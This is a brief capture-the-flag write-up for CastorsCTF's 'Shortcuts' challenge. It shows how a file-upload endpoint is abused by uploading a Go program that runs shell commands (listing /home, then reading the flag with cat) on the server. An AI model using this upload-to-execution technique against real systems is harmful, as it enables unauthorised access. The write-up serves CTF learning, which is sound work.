CastorsCTF | Shortcuts

Description#

A web app for those who are too lazy to SSH in.

http://web1.cybercastors.com:14437

Cracking#

  • Us going to website, we just see a webpage with some ASCII art.

castorsCTF

  • Looking at the source reveals that there is one endpoint in the website called /list

castorsCTF

  • Going to the endpoint we see that we can upload some files so this should be RCE (Remote Code Execution)

castorsCTF

grep.go

package main

import (
    "fmt"
    "os/exec"
)

func main() {
    out, _ := exec.Command("ls",  "/home").Output()
    fmt.Println(string(out))
}

[This checks the users on this system]

  • Running this gives us

castorsCTF

  • Now lsing into the home gives us some saucy stuff.

castorsCTF

  • Now we just use the cat command to get the flag.

castorsCTF

© Aayushman Choudhary 2021

CastorsCTF | Shortcuts